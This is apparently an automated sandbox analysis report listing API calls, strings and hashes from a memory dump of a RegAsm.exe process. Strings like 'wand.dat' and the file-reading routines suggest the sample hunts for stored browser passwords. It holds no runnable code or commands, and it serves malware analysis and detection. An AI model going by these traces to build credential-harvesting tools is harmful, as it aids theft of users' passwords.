                                          • API ID: AttributesFilefreememset
                                          • String ID:
                                          APIs
                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                          • malloc.MSVCRT ref: 00417524
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                          • free.MSVCRT ref: 00417544
                                          • free.MSVCRT ref: 00417562
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                          • String ID:
                                          APIs
                                          • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                          • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                          • free.MSVCRT ref: 0041822B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: PathTemp$free
                                          • String ID: %s\etilqs_$etilqs_
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ErrorLastMessage_snwprintf
                                          • String ID: Error$Error %d: %s
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: foreign key constraint failed$new$oid$old
                                          Strings
                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                          APIs
                                          • memset.MSVCRT ref: 0044A6EB
                                          • memset.MSVCRT ref: 0044A6FB
                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: gj
                                          APIs
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                          • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                          • free.MSVCRT ref: 0040E9D3
                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??3@$free
                                          • String ID:
                                          APIs
                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                          • malloc.MSVCRT ref: 004174BD
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                          • free.MSVCRT ref: 004174E4
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                          • String ID:
                                          APIs
                                          • GetParent.USER32(?), ref: 0040D453
                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Window$Rect$ClientParentPoints
                                          • String ID:
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                          • memset.MSVCRT ref: 004450CD
                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                          • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                          • String ID:
                                          APIs
                                          • wcscpy.MSVCRT ref: 0044475F
                                          • wcscat.MSVCRT ref: 0044476E
                                          • wcscat.MSVCRT ref: 0044477F
                                          • wcscat.MSVCRT ref: 0044478E
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                          • String ID: \StringFileInfo\
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          APIs
                                          • memset.MSVCRT ref: 004100FB
                                          • memset.MSVCRT ref: 00410112
                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                          • _snwprintf.MSVCRT ref: 00410141
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                          • String ID: </%s>
                                          APIs
                                          • memset.MSVCRT ref: 0040D58D
                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ChildEnumTextWindowWindowsmemset
                                          • String ID: caption
                                          • API String ID: 1523050162-4135340389
                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                          APIs
                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                          • String ID: MS Sans Serif
                                          • API String ID: 210187428-168460110
                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                          APIs
                                          • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                          • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                          • memcmp.MSVCRT ref: 0041D8CB
                                          • memcmp.MSVCRT ref: 0041D913
                                          • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy$memcmp
                                          • String ID:
                                          • API String ID: 3384217055-0
                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                          • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                          APIs
                                          • memset.MSVCRT ref: 0040560C
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                          • String ID: *.*$dat$wand.dat
                                          • API String ID: 2618321458-1828844352
                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                          APIs
                                          • memset.MSVCRT ref: 00412057
                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                          • String ID:
                                          • API String ID: 3550944819-0
                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                          APIs
                                          • free.MSVCRT ref: 0040F561
                                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy$free
                                          • String ID: g4@
                                          • API String ID: 2888793982-2133833424
                                          • Opcode ID: 736b2a0850d57b1886aaef609728f86ad4ae4702e86aed8cee47d08aa5f40c62
                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                          • Opcode Fuzzy Hash: 736b2a0850d57b1886aaef609728f86ad4ae4702e86aed8cee47d08aa5f40c62
                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                          APIs
                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                          • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: @
                                          • API String ID: 3510742995-2766056989
                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                          APIs
                                          • memset.MSVCRT ref: 004144E7
                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                          • memset.MSVCRT ref: 0041451A
                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                          • String ID:
                                          • API String ID: 1127616056-0
                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                          • malloc.MSVCRT ref: 00417459
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                          • free.MSVCRT ref: 0041747F
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$freemalloc
                                          • String ID:
                                          • API String ID: 2605342592-0
                                          • Opcode ID: 53c249c4ed26904e3077c8c6e0d5a5fb1c5dae0b3f1e23511c3111531268d4c8
                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                          • Opcode Fuzzy Hash: 53c249c4ed26904e3077c8c6e0d5a5fb1c5dae0b3f1e23511c3111531268d4c8
                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                          • RegisterClassW.USER32(?), ref: 00412428
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                          • String ID:
                                          • API String ID: 2678498856-0
                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                          APIs
                                          • memset.MSVCRT ref: 0040F673
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                          • strlen.MSVCRT ref: 0040F6A2
                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                          • String ID:
                                          • API String ID: 2754987064-0
                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                          APIs
                                          • memset.MSVCRT ref: 0040F6E2
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                          • strlen.MSVCRT ref: 0040F70D
                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                          • String ID:
                                          • API String ID: 2754987064-0
                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: wcscpy$CloseHandle
                                          • String ID: General
                                          • API String ID: 3722638380-26480598
                                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                          APIs
                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                          • String ID:
                                          • API String ID: 764393265-0
                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                          APIs
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                          Memory Dump Source
